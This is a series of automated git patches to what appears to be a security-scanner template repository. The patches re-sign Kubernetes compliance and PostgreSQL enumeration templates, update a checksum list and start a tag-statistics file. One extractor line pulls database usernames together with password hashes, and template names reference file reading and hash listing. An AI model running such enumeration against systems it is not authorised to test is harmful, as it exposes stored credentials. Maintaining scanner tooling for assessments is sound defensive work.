dsl dsl: - response +# digest: 4a0a00473045022100d69f9d3352f6245cfa6f8e7d01fe74aa615f86848c9990dee3b7efed9888920e02202a7519d1ba3dc40214389af6146e1486832a051fba6fc79ae13ea45bece0f6ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml index 88eb65c93f..6c1b92ba04 100644 --- a/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml +++ b/cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a00483046022100b6c1a589b8b0530b22668279422d9e367506c2e5cbe53392b1e3871175a185300221008a9d26776f8f10fb9f5e02c5649df5da2f2e9b8dd61a6ff295abfba5a3d8f5b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-fs.yaml b/cloud/kubernetes/pods/k8s-readonly-fs.yaml index 2af51e9673..ad6fe90a0c 100644 --- a/cloud/kubernetes/pods/k8s-readonly-fs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-fs.yaml @@ -44,3 +44,4 @@ javascript: - type: dsl dsl: - response +# digest: 4b0a004830460221008d29bff5a9ee8436cbd007be3e8ea7d9adde22d7ba56b153dad3a298636f379e022100857902d59b4dc2849a6618197e3062762c537f08d7ff3b8b5c38e030bd054c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml index 9d4f8f2885..3b0e418a1e 100644 --- a/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml +++ b/cloud/kubernetes/pods/k8s-readonly-rootfs.yaml @@ -47,3 +47,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a004730450221008ab8295b6fd005e8c2e6adf415bc1afd2e4bf13da1309b9a1294010cd823ffb5022051261a124e174fb71b23d17a6e1cc22aad6096bfd8b57d0d73370257f852890d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-root-user-id.yaml b/cloud/kubernetes/pods/k8s-root-user-id.yaml index 2e9e83b50a..6fa033a475 100644 --- a/cloud/kubernetes/pods/k8s-root-user-id.yaml +++ b/cloud/kubernetes/pods/k8s-root-user-id.yaml @@ -46,3 +46,4 @@ javascript: - type: dsl dsl: - response +# digest: 4a0a004730450220517a362ea6e79742e15c12dcf13275a23e3507c4a8c72f25f0a5620100cce53a022100d04b0c6d1bf0da1801dc9c6c9bea05701fa7e0e43570cd5b8ad9fb90294aa44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml index 2aa43a9b77..e854fcf28e 100644 --- a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' +# digest: 4b0a00483046022100b232085c59b57ac9fa6515ccb4faba086a37843e2f3e49ea3cc2f1b91ff0b988022100ede211f4303e279be9eba6006668b780f859e41b10146f254f7087d7ffd59d1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml index 107ee47641..5b72cc4cbf 100644 --- a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml +++ b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument"' +# digest: 4b0a00483046022100804e50538e2b5172451e7af717c072c76d154e8459152c27695f28fb32ac3891022100d4b38531916b63c697db715e50dc59fc66ee965853fbade66739cff10da2314c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml index d56db8ee5a..07f53a6ae9 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"Etcd configuration is missing the " + argument + " argument"' +# digest: 4a0a004730450220059a57f65d444f0b1077915e04d118c7b75cf94cfcf0cdf9ac9d5f16da1bf82a022100d6221d11032c846acbdaf0b554e46d18ef2610cd742f49a029ab439f68ad8c54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml index da1b083822..29d2b83df5 100644 --- a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml @@ -40,3 +40,4 @@ code: - type: dsl dsl: - '"etcd server configuration is missing the " + argument + " arguments."' +# digest: 4b0a00483046022100bb84d21742988a88161e6550e0daba0c168c98de320123f6093e7a72ef91fcda022100ca1d3ec4487917633206b06c427a030e03aff246088870c7fc385dfd20076608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml index 8ce989ef2e..3437464786 100644 --- a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml +++ b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"Kubernetes cluster is not utilizing " + argument' +# digest: 490a00463044022065295ceaacd9118c5eb2c498014dba124da623bebdf66bb463b5f10bbcad67ae02207540c4d0f8a26672d94ca58df27833d77196a9cf94501d31f3f12312f8f55866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml index a7e5ef5d3a..0ae6fdf4cd 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"API server configuration lacks the " + argument + " argument."' +# digest: 490a0046304402202befd41f501babe2cad07a6ef72c1299e269b3cabf689e12636ba4f0ccdc7530022002d595a3a01f6b6c2a2292348cf08b3a83b36553fcb9571211d487b2d16efcb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml index af092baee5..cb04d50e2e 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' +# digest: 4b0a00483046022100d96b56a4ea64b5f2509a01b7093dca52fda894c1c0dce59b521436066e4c6822022100ebcfe47ebfa855f1b27e56810abb150c1476c49be4e6e2cf1c8323a4413d9947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml index 9e436e093d..bd26a32d7a 100644 --- a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml @@ -39,3 +39,4 @@ code: - type: dsl dsl: - '"API server configuration is missing the \"" + argument + "\" argument."' +# digest: 4a0a004730450220692bf764fc80285b0b002a7bf2352d3ab95f03709d5382a2827ff5e55e77c2fe0221008deaa337aa54769c63b952108388b5d9fe574cf2ad30404fe0501b186730c1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml index aa3bd1f842..e519962c9e 100644 --- a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml +++ b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml @@ -40,3 +40,4 @@ code: - type: dsl dsl: - '"API server configuration is missing the " + argument + " argument."' +# digest: 490a004630440220663b353d03208073f03e9fd1ca874cd74a23c3d7516268be639eba641bcbc8a302201a5914f5f7cb59043a838f3567cabf472f857962f3da09a3b059c6e12d2e3957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d8cd7e1508d31ee3c76c61e63426321227957043 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 11:58:45 +0000 Subject: [PATCH 0618/1841] Auto Generated Templates Checksum [Tue Jun 25 11:58:45 UTC 2024] :robot: --- templates-checksum.txt | 82 +++++++++++++++++++++--------------------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 24d9a0831b..7761967b16 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -107,40 +107,40 @@ cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 -cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml:b0256d3b1e923f1963c68461752df9b1f337fbce -cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml:fe526a3b24b971f5b7635f1d1765940818998507 -cloud/kubernetes/deployments/k8s-default-namespace-used.yaml:c018176345e3e1d43616ee8cf049aa47842a2a7b -cloud/kubernetes/deployments/k8s-host-ports-check.yaml:42b730a989639685ab72c7aeebda4c250c240cfa -cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml:e6d20496208f0fb4a6aed171ae2ad872972f9d41 -cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml:725a8566dae96757f547ba91da59b9324920e330 -cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml:1103324f6546f227cd64e7d7c91b8046d2c6a4bf -cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml:5392c0b53975d2f42ddb031eba8c95050f315bfd -cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml:2e1acf1aacf206a5c08ee14ddac1dfe56812d7e5 -cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml:fbeebb2ddf1ffc946d39475fbbecfbcdf6b18f7d -cloud/kubernetes/deployments/k8s-privileged-container.yaml:803046749ae245267a75d51fda36d1c2ed20528e -cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml:17f199a4c7f0991b83d2f331c6d42b4c21c0a8f4 -cloud/kubernetes/deployments/k8s-root-container-admission.yaml:bfa89192646d55644ad992652f7d44c81477ab80 -cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml:a1ac40772edde2f855466c872d885903ba52aa9d -cloud/kubernetes/kubernetes-code-env.yaml:5a90adec609c6c3da3122ee8cb7607b713642070 -cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml:37b9b2aa40cc4cd83794197df7c81e8501f69071 -cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml:e8452c9d2d63afa32aad6dc8af77fa1c5b8e551c -cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml:87ac6dd8a417b887104048ba8cbc73fbb9a83602 -cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml:cfc000947d850498df71aac0dcd337cbd97523c6 -cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml:c7002bfb0e998a9180b1cf00d893a7fb679d28c7 -cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml:7b834fcf5af9d8502b89248093b33c502707f541 -cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml:36b728292e22fbf7aacf1603cc5dff4b597528c9 -cloud/kubernetes/pods/k8s-readonly-fs.yaml:37959e7218013ec30fa483288e131bdabac5b421 -cloud/kubernetes/pods/k8s-readonly-rootfs.yaml:514226d5f66ef22c02e7dc0b0a09fa420eeea921 -cloud/kubernetes/pods/k8s-root-user-id.yaml:9dc2d80779b85474681505b2e5db135e7d51c4d4 -cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml:f9bc836813c950599c9bd135cfb79537562ef11d -cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml:df501d7304572ac3c4f2dfe35615d519a301c120 -cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml:b17e3c5688c5b1096c1722be3cc5bd4f5421ee46 -cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml:ae3c64fa9ecac8af6a5b58466945fd128d70771f -cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml:80414c9007dea73037b67828ce1105347d739d18 -cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml:2b67984596aa68785f81ed560ccccc30d665f774 -cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml:7721783dcdcc628d0eb9aed1ed5f584a9122fdb8 -cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml:73c75c1fccc2f0183e0282748146186307be911a -cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml:660655b72822ba9fd76acb213d71748fd597091e +cloud/kubernetes/deployments/k8s-cpu-limits-not-set.yaml:bebdc1d8778a707b6828a4c0ba5d8875ad32aa7f +cloud/kubernetes/deployments/k8s-cpu-requests-not-set.yaml:5c769f9c293b695edc0428bd3fdeaf30fdddc03d +cloud/kubernetes/deployments/k8s-default-namespace-used.yaml:8e9e91f3fffb3a0c82ca05371864f51b43e13808 +cloud/kubernetes/deployments/k8s-host-ports-check.yaml:3b50aed641f3e9fc20cd262379320d70457ad64a +cloud/kubernetes/deployments/k8s-image-pull-policy-always.yaml:5749003df1a656d8e5e699157ba92962db1b4984 +cloud/kubernetes/deployments/k8s-image-tag-not-fixed.yaml:b1e75de5e03b7647f6fbc4431b6f3f2d2a2bddb3 +cloud/kubernetes/deployments/k8s-liveness-probe-not-configured.yaml:4878068208c67dd49a0e2a8659df4298b451b38c +cloud/kubernetes/deployments/k8s-memory-limits-not-set.yaml:7abe1daff699d18198d6f7ffd99e5139ea38d2bd +cloud/kubernetes/deployments/k8s-memory-requests-not-set.yaml:f941d92674dae1a7c927e9297312c2c4fed0bba0 +cloud/kubernetes/deployments/k8s-minimize-added-capabilities.yaml:6b1519405bdf352d4b366084aac74f876507e184 +cloud/kubernetes/deployments/k8s-privileged-container.yaml:a522f9c1dc2789b1431a2bb2a00861dba1cc9923 +cloud/kubernetes/deployments/k8s-readiness-probe-not-set.yaml:56983751c42e74f079837a06ed110ea85e1485e1 +cloud/kubernetes/deployments/k8s-root-container-admission.yaml:ea817f0347dd47bb614daa13a7d79baf1ad42c86 +cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml:1385ad8edc6332a41291ce2aa1beb5d1ef1caa48 +cloud/kubernetes/kubernetes-code-env.yaml:89431873f972f12a75b4c934e8cf2561b166655e +cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml:92c9646d2c642482a4b92f1308d510b4d8f6cc75 +cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml:3b91af7ec262b93ec8e95ac37341d1a7177a2072 +cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml:5e6af66e1a167a4043f98f88fa95e73b725ab274 +cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml:2602f522f5c9475ee940517259fc6d5ffe14bc49 +cloud/kubernetes/pods/k8s-containers-share-host-ipc.yaml:9b9a18b93616ee8e3b7d6ea71b8f0e650632f258 +cloud/kubernetes/pods/k8s-host-network-namespace-shared.yaml:3b1096ab940d2eb4663b87fef6b4a02d63a157bb +cloud/kubernetes/pods/k8s-host-pid-namespace-sharing.yaml:69a229d0c09f4aef52af3af1ffc36ecae765dafd +cloud/kubernetes/pods/k8s-readonly-fs.yaml:e239ca3e14b1d2d832e39ba74049efdbd27bee78 +cloud/kubernetes/pods/k8s-readonly-rootfs.yaml:d02d8eb9a66653479e5ce53e7e14518bc20beb0c +cloud/kubernetes/pods/k8s-root-user-id.yaml:4c809ba7d85216d300658534f9f818ed9413db5b +cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml:4b3e8385ceca57f24a11a021355442cb948c9e32 +cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml:b9022f0409ce055985bd7e1a5997cd79683935fa +cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml:1713c4172b863cb4555b0ce371ff16dba52d6a2f +cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml:e1bf16c85aeff81c50b1e55c166ea75e4f70f953 +cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml:7eb47285325094dc230cea52e5a252e5c45d54ce +cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml:56b5c91a93931f0f9268c0256b2c9225dcaf937b +cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml:002264eef4f40e8206ab77ae3afda21c5831119c +cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml:cbd7d7551ecf48585a4f160088dbfe3f06b0fe9e +cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml:3dafc462409991e8768d5edb50299467ca57dad0 code/cves/2019/CVE-2019-14287.yaml:4bac98e672bcc82f1fdb764079e0c1b087e59b12 code/cves/2021/CVE-2021-3156.yaml:4df2c2fa45f3503655f6ed1b743668b82afda3f5 code/cves/2023/CVE-2023-2640.yaml:08c6ebd7086926c0712bc1ecc78353604883a385 @@ -8573,12 +8573,12 @@ javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b javascript/enumeration/mysql/mysql-show-databases.yaml:1d696acf5bb7da5b077fea32f568e4875e129575 javascript/enumeration/mysql/mysql-show-variables.yaml:df67667eff109ba3b7c7a6062f98ae1065b0fc53 javascript/enumeration/mysql/mysql-user-enum.yaml:58f73167aa8a07b54694c8e2e78c608e6d666de5 -javascript/enumeration/pgsql/pgsql-default-db.yaml:01535222cf802bead99012c11eab547724bbcc62 -javascript/enumeration/pgsql/pgsql-file-read.yaml:f144dc889934299233df5db34f1d4a71e9bf062b -javascript/enumeration/pgsql/pgsql-list-database.yaml:37af19b3bef7e45bbdff5062278937dcc67ba5bd -javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:94c9094e253a2d4ad68b6e6cffafa62d0e648102 -javascript/enumeration/pgsql/pgsql-list-users.yaml:63be4899eb8f8da2d9b0bff9cba6210ad9b419d5 -javascript/enumeration/pgsql/pgsql-version-detect.yaml:9514730f6b2fa3d2a4b288ec6bea3ba0bc02eb0e +javascript/enumeration/pgsql/pgsql-default-db.yaml:a982b1edf4fc47cfd388e6957f60e244a1103f2f +javascript/enumeration/pgsql/pgsql-file-read.yaml:2d44baf3ef320482632da3ce686ee5c1801dd3b9 +javascript/enumeration/pgsql/pgsql-list-database.yaml:da4f3d6319890e9719d9f566a62c721745f5209f +javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml:7c26ad0443d18820a6ac98a8f70218d4e557c3a6 +javascript/enumeration/pgsql/pgsql-list-users.yaml:ac49221a5ef9bc515655f7d42892d37ede27c6b3 +javascript/enumeration/pgsql/pgsql-version-detect.yaml:db5083a51d2c67d772ec713cbdcf0fb605bac0f9 javascript/enumeration/pop3/pop3-capabilities-enum.yaml:96878ec61ba4002050d1d7fd3cfb7f3b12aecf53 javascript/enumeration/redis/redis-info.yaml:17c3e097148f2d246110091f046a266ecbf56fba javascript/enumeration/redis/redis-require-auth.yaml:3d66c2357254969ae88da94c87b3a25817a34615 @@ -8789,7 +8789,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e823d11771aba159bcd020118af071a8f6370f67 +templates-checksum.txt:58e5c2e9514824ab4a9bdc66cd2fa680c2fdf72f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ad2968109a408740617f6da03cad9fadabee6dd0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 12:00:26 +0000 Subject: [PATCH 0619/1841] Auto Template Signing [Tue Jun 25 12:00:26 UTC 2024] :robot: --- javascript/enumeration/pgsql/pgsql-default-db.yaml | 2 +- javascript/enumeration/pgsql/pgsql-file-read.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-database.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml | 2 +- javascript/enumeration/pgsql/pgsql-list-users.yaml | 2 +- javascript/enumeration/pgsql/pgsql-version-detect.yaml | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index abc05d2f53..d3520c261e 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -55,4 +55,4 @@ javascript: - "success == true" - "response == true" condition: and -# digest: 4a0a00473045022100ac0fd89555e8c98937d1cd9695b7997f87cfebc72da1822cab5388809cad5a8a02202dfed379847db4beee9a5847b6b38977c5d116c05ca02efd4e599252b08b93dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0e2df6a76382a76647e8fb5709d54d81b52c58316dc822bb79619fe8fe674e502204fa4c077232db3aed0d54b3ceedb4fd63b852643682274ded7b5a3abd725059f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index e77c1dcdbe..2e3f505e39 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -49,4 +49,4 @@ javascript: - type: json json: - '.Rows[].pg_ls_dir' -# digest: 4b0a0048304602210095a0f56d8e1159c3c63ad0ce828e6fbec808386269ca3f79cdf466f469db46a0022100d8496463e9008ace638ea54651811a2dac970d56641ab8ada49883425177e6a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022055f2bfd69954bbe89c0a09641137c6ca6a3058fa4a65b82096fcd5f9d1d365e80221008607bfa79b4fb7aafb9d6a10c63bf48f0c7b8121bf691d6f0abe5ad3bebaedb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index a8a8c0b690..c32d8addb0 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -50,4 +50,4 @@ javascript: - type: json json: - '.Rows[].datname' -# digest: 4a0a004730450220194757a2f6a4644cd24e525bc9102446438aa7f44afa2ea39d6b1532d3c9faa0022100b086fea6b01fcfdb0f16c98359bf3ed9e70a0572cc0c17ece4e444c9ca7b0019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a9ac9ae53e00f334f110df2b9ea9e5505c76a361e91cf72cd1295f53864a3fd022100e07fd8e28bbc7292dd0b3b86acfe064187b48fb8354af3a0f109a3367ff34416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index 6a9aa5d455..8738211d67 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -51,4 +51,4 @@ javascript: - type: json json: - '.Rows[] | "\(.usename) : \(.passwd)"' -# digest: 4b0a00483046022100b0d5122ae901c01ea4242edccdb53eb0989039a5e2490006f6e984e753a1ca73022100b923b759f6263ff50f5da53ac7544553c00a623c22c0acf4f04a07135f067929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eadfce2997111bfea81cb5e320364402b711a35bffcf2da9e7698419a2d02932022100984ef022c43f4883f758a43178f6817e3fb6ec4df6b91f59bb037aad300028d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index e679facdb7..5be3639250 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -49,4 +49,4 @@ javascript: - type: json json: - '.Rows[].usename' -# digest: 490a0046304402204dd4543b0ba519424d42b73e5442225a8490adffff5eaa52fb0ce489262b1e8c0220557d46d9056203e7117a37571ace140e2782b86aaef45677866c39d60e31b74f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009968c6a32d528f754ec6138bd6975500fa3be1e5617b932e966baa0fb4c1db09022044e3918c8bfc3f3762e42de5ffc65307a5a8bf398d2b8758a583ac0f8b91537f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index 54f7c25094..9c23f5b4fc 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -49,4 +49,4 @@ javascript: - type: json json: - '.Rows[0].version' -# digest: 490a00463044022007eee9d283a48c1c6910ddb17091ea8e47a4f1dfe9a2683d23323e2daf2e055302205a9ddfb5106429c74cead907b525db6db1733c2a283a69e32f0f6f7eb94c9866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b1d0eba6343290231420c39a35a31b35cec9061fd4ab10aea0bcb34820d358e02204d5276d2fa1052c85a774d6893728d33a153b309d415f0ed82532bc45172b4ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 53ae126b5debbf58d55f5554c2679e1e1d599148 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 12:15:32 +0000 Subject: [PATCH 0620/1841] Auto Generated Templates Stats [Tue Jun 25 12:15:32 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10980 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5539 insertions(+), 5463 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 178daf2c21..d1eeef34ce 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2511},{"name":"panel","count":1157},{"name":"wordpress","count":983},{"name":"exposure","count":948},{"name":"xss","count":911},{"name":"wp-plugin","count":852},{"name":"osint","count":804},{"name":"tech","count":686},{"name":"lfi","count":662},{"name":"misconfig","count":659},{"name":"rce","count":600},{"name":"edb","count":599},{"name":"packetstorm","count":544},{"name":"wpscan","count":502},{"name":"cve2021","count":491},{"name":"cve2022","count":479},{"name":"wp","count":426},{"name":"cve2023","count":380},{"name":"unauth","count":367},{"name":"sqli","count":364},{"name":"file","count":346},{"name":"authenticated","count":343},{"name":"intrusive","count":302},{"name":"detect","count":295},{"name":"login","count":284},{"name":"kev","count":275},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"default-login","count":216},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"network","count":195},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":191},{"name":"devops","count":177},{"name":"cve2018","count":170},{"name":"iot","count":167},{"name":"cve2019","count":164},{"name":"keys","count":156},{"name":"joomla","count":148},{"name":"install","count":147},{"name":"malware","count":142},{"name":"tcp","count":136},{"name":"redirect","count":135},{"name":"aws","count":134},{"name":"cloud","count":134},{"name":"auth-bypass","count":133},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":117},{"name":"files","count":113},{"name":"cms","count":113},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":90},{"name":"disclosure","count":89},{"name":"linux","count":85},{"name":"code","count":81},{"name":"cve2024","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":73},{"name":"oss","count":68},{"name":"js","count":67},{"name":"cisco","count":67},{"name":"enum","count":65},{"name":"adobe","count":63},{"name":"ir","count":61},{"name":"huntr","count":60},{"name":"cve2015","count":59},{"name":"atlassian","count":59},{"name":"cve2016","count":57},{"name":"vmware","count":56}